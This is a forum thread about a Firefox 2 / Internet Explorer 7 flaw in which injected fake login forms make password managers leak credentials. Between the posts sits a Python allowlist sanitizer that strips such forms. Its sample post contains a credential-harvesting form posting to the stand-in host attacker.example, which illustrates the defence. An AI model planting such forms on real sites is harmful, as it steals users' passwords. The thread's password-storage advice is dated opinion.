Firefox 2 and Internet Explorer 7 could allow attackers to steal passwords

Dubbed a Reverse Cross Site Request vulnerability (RCSR) by its discoverer Robert Chapin, the flaw allows hackers to compromise users' passwords and usernames by presenting them with a fake login form.

Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services (CIS) site.

An exploit for this flaw has already been seen on social networking site MySpace, and could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin.

"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses," claimed Chapin.

_____________

I don't think I'll activate the Password Manager in FF anytime soon...

/Claes
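The article's attack works because the injected login form is ordinary HTML that the trusted site renders verbatim, so the browser treats it like any other form on that domain. The standard server-side mitigation is to pass user-generated HTML through an allowlist sanitizer that strips form-related elements before the post is stored or displayed. The following Python sanitizer is an added example for this thread, not code from the article, from Chapin Information Services, or from Firefox or Internet Explorer; it uses only the standard library, and the tag allowlist, the `sanitize` function and the constructed sample post (including the placeholder host `attacker.example`) are my own choices.

```python
"""Allowlist HTML sanitizer that removes login-form elements from
user-generated content before it is rendered on a trusted site.

Added example, not from the original thread. Uses only the standard
library; the allowlist and sample post below are constructed for
illustration.
"""
from html import escape
from html.parser import HTMLParser

# Tags a blog or forum post may keep. Everything else is dropped, so
# <form>, <input>, <iframe>, <script> and similar never reach the page and
# a browser password manager has nothing to auto-fill.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br", "input", "img", "hr", "meta", "link"}
# Elements whose contents are dropped too, not just the tag: nothing inside
# a form, script or frame belongs in a post on a trusted domain.
DROP_CONTENT = {"form", "script", "style", "iframe", "object", "embed",
                "select", "textarea", "button"}


class FormStrippingSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized fragments, joined at the end
        self.dropped = []    # top-level tags removed, useful for logging
        self._suppress = []  # stack of open DROP_CONTENT elements

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropped.append(tag)
            self._suppress.append(tag)
            return
        if self._suppress:           # inside a dropped element: skip
            return
        if tag not in ALLOWED_TAGS:  # e.g. a stray <input> outside a form
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                # Only plain http/https/mailto links survive on <a>.
                if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                    continue
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._suppress:
            if tag == self._suppress[-1]:
                self._suppress.pop()
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._suppress:
            self.out.append(escape(data))  # re-escape decoded text


def sanitize(user_html: str) -> tuple[str, list[str]]:
    """Return (clean_html, dropped_tags) for one user-submitted fragment."""
    parser = FormStrippingSanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample: a post that embeds a login form posting to an outside
# host, the pattern the article describes. attacker.example is a placeholder.
SAMPLE_POST = (
    "<p>Great thread! Sign in to see my <b>profile</b>:</p>"
    '<form action="http://attacker.example/collect" method="post">'
    'Username <input name="username"> Password '
    '<input type="password" name="password">'
    '<input type="submit" value="Log in"></form>'
    '<p>More at <a href="https://example.org/blog">my blog</a> '
    '<a href="javascript:alert(1)">click</a></p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_POST)
    print("dropped:", dropped)
    print("clean:  ", clean)
```

The sanitizer fails closed: an unclosed `<form>` suppresses everything after it rather than letting later markup through, and the `dropped` list gives a moderation or detection hook (a post that had a `form` stripped is worth flagging, since legitimate forum content rarely contains one).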

chergh - 2008

A very good reason to never use the password manager included in these programs, or any other program for that matter.

If you have too many usernames and passwords to remember then I would suggest writing them down either on a bit of paper or in a text file on your computer. If you are worried about other users of a computer finding these then I would suggest writing the info in a text file then downloading PGP, free for non-commercial use, and using this to encrypt the text file.

If you want to view blogs and you have information in your password manager then it may be worthwhile downloading the Opera internet browser as this does not seem to be vulnerable to the same flaw, and using this to view any blogs etc until a security patch for these products is released.